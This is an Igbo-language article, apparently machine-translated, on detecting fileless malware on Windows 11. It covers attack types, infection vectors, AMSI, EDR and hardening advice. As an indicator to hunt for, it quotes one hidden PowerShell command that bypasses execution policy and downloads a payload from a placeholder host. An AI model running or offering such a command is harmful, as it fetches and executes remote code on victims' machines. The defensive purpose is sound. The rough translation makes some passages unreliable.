Otu esi achọpụta malware na-enweghị faịlụ dị ize ndụ na Windows 11

¿Otu esi achọpụta malware na-enweghị faịlụ dị ize ndụ? Ọrụ mbuso agha enweghị faịlụ etoola nke ukwuu, ma mee ka okwu ka njọ, Windows 11 anaghị egbochi yaỤzọ a na-agafe diski ahụ ma dabere na ebe nchekwa na ngwaọrụ sistemụ ziri ezi; ya mere mmemme antivirus dabere na mbinye aka na-agba mgba. Ọ bụrụ na ị na-achọ ụzọ a pụrụ ịdabere na ya iji chọpụta ya, azịza ya dabere na ijikọta telemetry, nyocha omume na njikwa Windows.

N'ime gburugburu ebe obibi dị ugbu a, mkpọsa ndị na-emejọ PowerShell, WMI, ma ọ bụ Mshta na-ebikọ ọnụ na usoro ọkaibe dị ka ịgbanye ebe nchekwa, nnọgidesi ike "na-emetụghị" diski ahụ, na ọbụna na-emebi ngwa ngwaIsi ihe bụ ịghọta maapụ iyi egwu, usoro ọgụ, yana akara ngosi ha na-ahapụ ọbụlagodi mgbe ihe niile na-eme n'ime RAM.

Kedu ihe bụ malware na-enweghị faịlụ na gịnị kpatara o ji nwee nchegbu na Windows 11?

Mgbe anyị na-ekwu maka iyi egwu "enweghị faịlụ", anyị na-ezo aka na koodu ọjọọ nke ahụ Ịchọghị nkwụnye ego ọhụrụ executables na sistemụ faịlụ iji rụọ ọrụ. A na-agbanyekarị ya n'ime usoro ịgba ọsọ ma gbuo ya na RAM, dabere na ndị ntụgharị na ọnụọgụ abụọ nke Microsoft bịanyere aka na ya (dịka ọmụmaatụ, PowerShell, WMI, rundll32, mshtaNke a na-ebelata akara ukwu gị ma na-enye gị ohere ịgafe engines na-achọ naanị faịlụ enyo.

Ọbụlagodi akwụkwọ ọfịs ma ọ bụ PDF nke na-erigbu adịghị ike iji wepụta iwu ka a na-ewere dịka ihe omume, n'ihi na rụọ ọrụ ogbugbu na ebe nchekwa na-ahapụghị ọnụọgụ abụọ bara uru maka nyocha. Mmegbu nke macro na DDE Na Office, ebe koodu ahụ na-agba ọsọ na usoro ziri ezi dị ka WinWord.

Ndị na-awakpo na-ejikọta injinịa mmekọrịta (phishing, spam links) na ọnyà teknụzụ: pịa onye ọrụ na-amalite agbụ nke edemede na-ebudata ma na-arụ ọrụ ikpeazụ na ebe nchekwa, na-ezere ịhapụ akara na diski. Ebumnobi ndị a sitere na izu ohi data ruo ogbugbu nke ransomware, gaa na mmegharị mpụta nkịtị.

Ụdị site na akara ukwu dị na sistemụ: site na 'dị ọcha' ruo ngwakọ

Iji zere echiche ndị na-agbagwoju anya, ọ na-enye aka ikewapụ egwu site na ogo mmekọrịta ha na sistemụ faịlụ. Nkewa nke a na-eme ka o doo anya ihe na-aga n'ihu, ebee ka koodu ahụ bi, na ihe ịrịba ama ọ na-ahapụ?.

Ụdị I: enweghị ọrụ faịlụ

malware enweghị faịlụ kpamkpam anaghị ede ihe ọ bụla na diski. Ihe atụ kpochapụrụ bụ iji a adịghị ike netwọk (dị ka vector EternalBlue laa azụ n'ụbọchị) iji mejuputa ebe obibi na ebe nchekwa kernel (ikpe dị ka DoublePulsar). N'ebe a, ihe niile na-eme na RAM ma ọ dịghị ihe ọ bụla dị na faịlụ faịlụ.

Nhọrọ ọzọ bụ imetọ ya femụwe nke components: BIOS/UEFI, netwọk nkwụnye, USB peripherals (BadUSB-ụdị usoro) ma ọ bụ ọbụna CPU subsystems. Ha na-aga n'ihu site na ịmalitegharị na ntinyegharị, yana ihe isi ike agbakwunyere na Ngwaahịa ole na ole na-enyocha firmwareNdị a bụ ọgụ dị mgbagwoju anya, ọ na-adịkarị obere, mana dị ize ndụ n'ihi nkwụsị ha na ịdịte aka ha.

Ụdị II: Ọrụ nchekwa akwụkwọ na-apụtaghị ìhè

N'ebe a, malware anaghị 'ahapụ' nke ya nwere ike ịrụ ọrụ, kama ọ na-eji arịa ejiri sistemụ na-echekwa nke ọma dị ka faịlụ. Dị ka ihe atụ, backdoors na osisi powershell nyere iwu na ebe nchekwa WMI wee kpalite ogbugbu ya na nzacha mmemme. Ọ ga-ekwe omume ịwụnye ya site na ahịrị iwu na-enweghị ịhapụ ọnụọgụ abụọ, mana ebe nchekwa WMI na-ebi na diski dị ka nchekwa data ziri ezi, na-eme ka o sie ike ihicha na-enweghị emetụta usoro ahụ.

Site na echiche bara uru, a na-ewere ha na enweghị faịlụ, n'ihi na akpa ahụ (WMI, ndekọ, wdg) Ọ bụghị kpochapụwo nwere ike ịchọpụta Na mkpocha ya abụghị ihe ọhụrụ. Ihe si na ya pụta: nnọgidesi ike na-ezighi ezi na obere "ọdịnala" nchọta.

Ụdị III: Achọrọ faịlụ ka ọ rụọ ọrụ

Ụfọdụ ikpe na-akwado a 'enweghị faịlụ' nkwụsi ike N'ọkwa ezi uche dị na ya, ha chọrọ mkpalite dabere na faịlụ. Ihe atụ a na-ahụkarị bụ Kovter: ọ na-edebanye aha ngwaa shei maka ndọtị na-enweghị usoro; Mgbe emeghere faịlụ nwere ndọtị ahụ, a na-ewepụta obere edemede na-eji mshta.exe, nke na-ewughachi eriri ọjọọ ahụ site na ndekọ.

Aghụghọ a bụ na faịlụ “ụta” ndị nwere ndọtị na-enweghị usoro enweghị ụgwọ a na-enyocha, na ọtụtụ koodu ahụ bi na ya. ndebanye (akpa ọzọ). Ọ bụ ya mere eji ekewa ha dị ka enweghị faịlụ na mmetụta, ọ bụ ezie na n'ikwu okwu n'ụzọ doro anya, ha na-adabere na otu ma ọ bụ karịa arịa diski dị ka ihe na-akpali.

Vectors na 'ndị ọbịa' nke ọrịa: ebe ọ na-abanye na ebe ọ na-ezo

Iji meziwanye nchọpụta, ọ dị mkpa ịkọwapụta ebe ntinye na onye butere ọrịa ahụ. Echiche a na-enyere aka ịmepụta njikwa kpọmkwem Wepụta telemetry kwesịrị ekwesị ụzọ.

ịkpa

• Dabere na faịlụ (Ụdị III): Akwụkwọ, executable, ihe nketa Flash/Java faịlụ, ma ọ bụ faịlụ LNK nwere ike irigbu ihe nchọgharị ahụ ma ọ bụ injin na-edozi ha iji tinye koodu shei n'ime ebe nchekwa. Vector nke mbụ bụ faịlụ, mana ụgwọ ọrụ na-aga na RAM.
• dabere na netwọkụ (Ụdị I): Otu ngwugwu na-erigbu adịghị ike (dịka, na SMB) na-enweta ogbugbu na ala onye ọrụ ma ọ bụ kernel. WannaCry mere ka usoro a gbasaa. Ibu ebe nchekwa ozugbo enweghị faịlụ ọhụrụ.

Hardware

• Ngwaọrụ (Ụdị I): Enwere ike gbanwee diski ma ọ bụ kaadị netwọọdụ ma webata koodu. Ọ siri ike inyocha ma na-adịgide na mpụga OS.
• CPU na njikwa subsystems (Ụdị I): Teknụzụ dị ka Intel's ME/AMT egosipụtala ụzọ Netwọk na mkpochapụ n'èzí OSỌ na-awakpo n'ogo dị ala, na-enwe nnukwu ohere stealth.
• USB (Type I): BadUSB na-enye gị ohere ịmegharị draịvụ USB iji mee ka ọ dị ka keyboard ma ọ bụ NIC wee malite iwu ma ọ bụ redirect okporo ụzọ.
• BIOS / UEFI (Type I): ihe ọjọọ firmware reprogramming (ikpe dị ka Mebromi) na-agba n'ihu Windows akpụkpọ ụkwụ.
• Hypervisor (Ụdị nke Mbụ): Na-emejuputa mini-hypervisor n'okpuru OS iji zoo ọnụnọ ya. Ọ dị ụkọ, mana achọpụtalarị n'ụdị rootkits hypervisor.

Mgbu na injection

• Dabere na faịlụ (Ụdị III): EXE/DLL/LNK ma ọ bụ ọrụ akwadoro nke na-ebute injections n'ime usoro ziri ezi.
• Macros (Ụdị III): VBA dị na Office nwere ike dekọọ ma mebie ụgwọ a na-akwụ ụgwọ, gụnyere ihe mgbapụta zuru ezu, na nkwenye onye ọrụ site na aghụghọ.
• Ihe ederede (Ụdị II): PowerShell, VBScript ma ọ bụ JScript sitere na faịlụ, ahịrị iwu, ọrụ, Ndebanye aha ma ọ bụ WMIOnye na-awakpo ahụ nwere ike pịnye edemede ahụ na nnọkọ dịpụrụ adịpụ na-emetụghị diski ahụ.
• Ndekọ buut (MBR/Boot) (Ụdị II): Ezinụlọ dị ka Petya na-edegharị ngalaba buut ka ha weghara na mmalite. Ọ dị n'èzí sistemụ faịlụ, mana enwere ike ịnweta OS na ngwọta ọgbara ọhụrụ nwere ike iweghachi ya.

Otu ọgụ na-enweghị faịlụ si arụ ọrụ: usoro na akara

Agbanyeghị na ha anaghị ahapụ faịlụ ndị enwere ike ịmegharị, mkpọsa ahụ na-agbaso mgbagha nke agbadoro anya. Ịghọta ha na-enye ohere maka nlekota. ihe omume na mmekọrịta dị n'etiti usoro nke ahụ na-ahapụ akara.

• Nnweta iziziMwakpo phishing site na iji njikọ ma ọ bụ mgbakwunye, webụsaịtị emebie, ma ọ bụ nzere zuru ezu. Ọtụtụ agbụ na-amalite site na akwụkwọ Office nke na-ebute iwu PowerShell.
• Nnọgidesi ike: backdoors site na WMI (nzacha na ndebanye aha), Igodo mmezu ndekọ ma ọ bụ ọrụ ahaziri nke na-amaliteghachi edemede na-enweghị faịlụ ọjọọ ọhụrụ.
• ExfiltrationOzugbo anakọtara ozi ahụ, a na-eziga ya na netwọkụ site na iji usoro ntụkwasị obi (ihe nchọgharị, PowerShell, bitsadmin) iji gwakọta okporo ụzọ.

Nke a ụkpụrụ bụ karịsịa aghụghọ n'ihi na ihe ngosi mbuso agha Ha na-ezo n'ụzọ kwesịrị ekwesị: arụmụka-ahịrịokwu, usoro ịgbụ usoro, njikọ ọpụpụ na-adịghị mma, ma ọ bụ ịnweta API injection.

Usoro ndị a na-ahụkarị: site na ebe nchekwa ruo na ndekọ

Ndị na-eme ihe nkiri na-adabere n'ụdị dị iche iche ụzọ na-ebuli stealth. Ọ na-enye aka ịmara ndị a na-ahụkarị iji mee ka nchọpụta dị irè.

• Onye bi na ebe nchekwa: Na-ebunye ụgwọ ọrụ n'ime oghere nke usoro a tụkwasịrị obi nke na-echere ịgbalite. rootkits na nko Na kernel, ha na-ebuli ọkwa nke nzuzo.
• Nkwụsi ike na ndekọChekwa bbs ezoro ezo na igodo wee mee ka mmiri dị n'ime ha site na onye mbido ziri ezi (mshta, rundll32, wscript). Onye nrụnye ihe ephemeral nwere ike ibibi onwe ya ka o wedata akara ukwu ya.
• phishing nzereIji aha njirimara na okwuntughe zuru ezu, onye mwakpo ahụ na-egbu mgbọ na osisi ndị dịpụrụ adịpụ ohere nkịtị na Registry ma ọ bụ WMI.
• Ransomware 'enweghị faịlụ'A na-ahazi nzuzo nzuzo na nkwukọrịta C2 site na RAM, na-ebelata ohere maka nchọpụta ruo mgbe a na-ahụ mmebi ahụ.
• Ngwa eji arụ ọrụ: ụdọ akpaghị aka nke na-achọpụta adịghị ike ma na-ebuga ụgwọ ebe nchekwa naanị mgbe onye ọrụ pịachara.
• Akwụkwọ nwere koodu: macros na usoro dị ka DDE na-akpalite iwu na-enweghị echekwa executables na disk.

Ọmụmụ ụlọ ọrụ egosilarị ọnụ ọgụgụ ndị pụtara ìhè: n'otu oge nke 2018, a ihe karịrị 90% na script dabere na ọgụ yinye PowerShell, ihe ịrịba ama na a na-ahọrọ vector maka ịdị irè ya.

Ihe ịma aka maka ụlọ ọrụ na ndị na-ebubata ya: ihe kpatara igbochi ezughị oke

Ọ ga-abụ ihe na-achọsi ike gbanyụọ PowerShell ma ọ bụ machibido macros ruo mgbe ebighị ebi, mana Ị ga-agbaji ọrụ ahụPowerShell bụ ogidi nke nchịkwa ọgbara ọhụrụ na Office dị mkpa na azụmahịa; Ọ naghị ekwe omume igbochi kpuru ìsì.

Ọzọkwa, enwere ụzọ isi gafere njikwa ndị bụ isi: na-agba PowerShell site na DLLs na rundll32, scripts nkwakọ ngwaahịa n'ime EXEs, Weta nnomi nke PowerShell nke gị ma ọ bụ ọbụna zoo scripts na onyonyo wee wepụ ya na ebe nchekwa. Ya mere, nchekwa enweghị ike ịdabere naanị na ịgọnarị ịdị adị nke ngwaọrụ.

Njehie ọzọ na-emekarị bụ inyefe mkpebi ahụ dum na igwe ojii: ọ bụrụ na onye ọrụ ahụ ga-echere nzaghachi site na ihe nkesa, Ị na-atụfu mgbochi ozugboEnwere ike ibugo data telemetry iji mejupụta ozi ahụ, mana nke ahụ Mbelata ga-emerịrị na njedebe.

Otu esi achọpụta malware na-enweghị faịlụ na Windows 11: telemetry na omume

Atụmatụ mmeri bụ nyochaa usoro na ebe nchekwaỌ bụghị faịlụ. Àgwà ọjọọ na-akwụsi ike karịa ụdị faịlụ na-ewe, na-eme ka ọ dị mma maka engines mgbochi.

• AMSI (Antimalware nyocha ihu igwe)Ọ na-egbochi script PowerShell, VBScript, ma ọ bụ JScript ọbụlagodi mgbe arụnyere ha na ebe nchekwa. Ọ dị mma maka ijide eriri ndị emechiri emechi tupu e gbuo ya.
• Usoro nlekota oru: mmalite/mechaa, PID, nne na nna na ụmụaka, ụzọ, ahịrị iwu na hashes, gbakwunyere osisi igbu egbu iji ghọta akụkọ a n'uju.
• Nyocha ebe nchekwa: nchọpụta nke injections, na-atụgharị ma ọ bụ PE ibu na-enweghị imetụ diski ahụ, na nyochaa mpaghara ndị a na-adịghị ahụkebe.
• Nchekwa ngalaba mmalite: njikwa na mweghachi nke MBR/EFI ma ọ bụrụ na emejọ.

Na gburugburu Microsoft, Defender for Endpoint na-ejikọta AMSI, nlekota omumeA na-eji nyocha ebe nchekwa na mmụta igwe dabere na igwe iji tụọ nchoputa megide ụdị ọhụrụ ma ọ bụ kpuchiri ekpuchi. Ndị na-ere ahịa ndị ọzọ na-eji usoro ndị yiri ya na igwe kernel bi.

Ọmụmaatụ ezi uche nke mmekọrịta: site na akwụkwọ gaa na PowerShell

Cheedị otu agbụ ebe Outlook na-ebudata mgbakwunye, Okwu meghere akwụkwọ ahụ, etinyere ọdịnaya na-arụ ọrụ, wee jiri paramita enyo enyo malite PowerShell. Telemetry kwesịrị ekwesị ga-egosi nke ahụ Iwu iwu (dịka ọmụmaatụ, ExecutionPolicy Bypass, windo zoro ezo), jikọọ na ngalaba enweghị ntụkwasị obi yana ịmepụta usoro ụmụaka na-etinye onwe ya na AppData.

Onye nnọchi anya nwere ọnọdụ mpaghara nwere ike kwụsị ma laa azụ omume ọjọọ na-enweghị enyemaka aka, na mgbakwunye na ịkọrọ SIEM ma ọ bụ site na email/SMS. Ngwaahịa ụfọdụ na-agbakwunye oyi akwa na-akpata ihe kpatara ya (ụdị ụdịStoryLine), nke na-arụtụ aka na ọ bụghị usoro a na-ahụ anya (Outlook/Word), kama na eri ojoo zuru oke na mmalite ya iji sachaa usoro ahụ kpamkpam.

Otu ụkpụrụ iwu ị ga-elele anya nwere ike ịdị ka nke a: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logic abụghị ezigbo eriri, mana set nke akara: ngafe amụma, mpio zoro ezo, nbudata doro anya na mkpochapụ n'ime ebe nchekwa.

AMSI, pipeline na ọrụ nke onye ọ bụla na-eme ihe nkiri: site na njedebe ruo na SOC

E wezụga njide script, ụlọ ọrụ siri ike na-ahazi usoro ndị na-eme nyocha na nzaghachi. Ihe akaebe ndị ọzọ tupu emee ibu ahụ, ka mma., kacha mma.

• Ntinye ederedeAMSI na-ebuga ọdịnaya (ọbụlagodi ma ọ bụrụ na a na-eme ya na ofufe) maka nyocha dị ike na nke siri ike na pipeline malware.
• Usoro mmemmeA na-anakọta PIDs, ọnụọgụ abụọ, hashes, ụzọ na data ndị ọzọ. arụmụka, na-eguzobe usoro osisi nke dugara n'ibu ikpeazụ.
• Nchọpụta na mkpesaA na-egosipụta nchoputa a na njikwa ngwaahịa wee bufee ya na nyiwe netwọkụ (NDR) maka nhụta mgbasa ozi.
• Nkwenye onye ọrụỌbụlagodi na etinyere edemede n'ime ebe nchekwa, usoro ahụ AMSI na-egbochi ya na ụdị Windows dakọtara.
• Ike nchịkwa: nhazi amụma iji mee ka nyocha script nwee ike, igbochi omume dabere na ịmepụta akụkọ sitere na njikwa.
• SOC ọrụ: mmịpụta nke artifacts (VM UUID, OS version, ụdị edemede, usoro mmalite na nne na nna ya, hashes na ahịrị iwu) iji megharịa akụkọ ihe mere eme na iwulite iwu n'ọdịnihu.

Mgbe ikpo okwu na-enye ohere mbupụ na ebe nchekwa Ejikọtara ya na ogbugbu ahụ, ndị nchọpụta nwere ike ịmepụta nchọpụta ọhụrụ ma mee ka nchebe pụọ n'ụdị dị iche iche.

Ihe bara uru na Windows 11: mgbochi na ịchụ nta

Na mgbakwunye na ịnwe EDR na nyocha ebe nchekwa na AMSI, Windows 11 na-enye gị ohere imechi oghere ọgụ wee kwalite visibiliti. njikwa obodo.

• Ndebanye aha na mmachi na PowerShellNa-eme ka ngọngọ script na ndekọ ndekọ, na-emetụta ụdịdị amachibidoro ebe enwere ike, ma na-achịkwa iji Agafe/Zozoo.
• Iwu Mbelata Mwakpo Mwakpo (ASR).: igbochi mmalite nke usoro Office na Mmegbu WMI/PSExec mgbe ọ dịghị mkpa.
• Amụma nnukwu ụlọ ọrụ: gbanyụọ site na ndabara, ntinye aka na nnukwu nnukwu mbinye aka na ndepụta ntụkwasị obi siri ike; na-enyocha ihe nketa nke DDE.
• WMI Audit na ndekọ: na-enyocha ndebanye aha mmemme na igodo mmezu akpaaka (Run, RunOnce, Winlogon), yana imepụta ọrụ. ndokwa.
• Nchedo mmalite: na-arụ ọrụ Secure Boot, na-enyocha iguzosi ike n'ezi ihe MBR/EFI wee gosi na ọ nweghị mgbanwe ọ bụla na mmalite.
• Nkwachi na ike siri ike: na-emechi adịghị ike na ihe nchọgharị, ngwa Office na ọrụ netwọk.
• mmata: na-azụ ndị ọrụ na ndị otu nka na phishing na akara nke ogbugbu nzuzo.

Maka ịchụ nta, lekwasị anya na ajụjụ gbasara: ịmepụta usoro site na Office kwupụta PowerShell/MSHTA, arụmụka na downloadstring/nbudata faịlụEderede nwere nkpuchi doro anya, injections na-atụgharị uche, yana netwọk apụ apụ na TLD ndị na-enyo enyo. Tụgharịa akara ngosi ndị a na aha ọma na ugboro ole iji belata mkpọtụ.

Gịnị ka injin ọ bụla nwere ike ịchọpụta taa?

Ngwọta ụlọ ọrụ Microsoft jikọtara AMSI, nyocha omume, nyochaa ebe nchekwa na nchekwa ngalaba buut, gbakwunyere ụdị ML dabere na igwe ojii iji gbasaa megide ihe iyi egwu na-apụta. Ndị na-ere ahịa ndị ọzọ na-emejuputa nlebanya ọkwa ọkwa kernel iji mata ọdịiche dị njọ na sọftụwia adịchaghị mma yana mgbanwe mgbanwe na-akpaghị aka.

Ụzọ dabere na akụkọ igbu Ọ na-enye gị ohere ịchọpụta ihe kpatara ya (dịka ọmụmaatụ, mgbakwunye Outlook nke na-ebute agbụ) wee belata osisi ahụ dum: scripts, igodo, ọrụ, na ọnụọgụ abụọ, na-ezere ịrapagidesi ike na akara ngosi a na-ahụ anya.

Mmejọ nkịtị na otu esi ezere ha

Mgbochi PowerShell na-enweghị atụmatụ njikwa ọzọ abụghị naanị na ọ gaghị ekwe omume, mana enwerekwa ụzọ ịkpọku ya udioziOtu a na-emetụta macro: ma ị na-ejikwa ha na atumatu na mbinye aka, ma ọ bụ azụmahịa ahụ ga-ata ahụhụ. Ọ ka mma ilekwasị anya na telemetry na iwu omume.

Njehie ọzọ a na-ahụkarị bụ ikwere na ngwa whitelisting na-edozi ihe niile: teknụzụ na-enweghị faịlụ na-adabere kpọmkwem na nke a. ngwa tụkwasịrị obiNdị na-achịkwa kwesịrị ịhụ ihe ha na-eme na otú ha si emetụta, ọ bụghị nanị ma a na-ahapụ ha.

Site na ihe niile dị n'elu, malware na-enweghị faịlụ na-akwụsị ịbụ "mmụọ" mgbe ị na-enyocha ihe dị mkpa n'ezie: omume, ebe nchekwa na mmalite nke ọ bụla ogbugbu. Ijikọta AMSI, telemetry usoro bara ụba, njikwa Windows 11, yana oyi akwa EDR na nyocha omume na-enye gị uru. Tinye na nha anya atumatu ziri ezi maka macros na PowerShell, WMI/Registry auditing, na ichu nta nke na-ebute ahịrị iwu na nhazi osisi, ma ị nwere nchekwa nke na-ebipụ agbụ ndị a tupu ha eme ụda.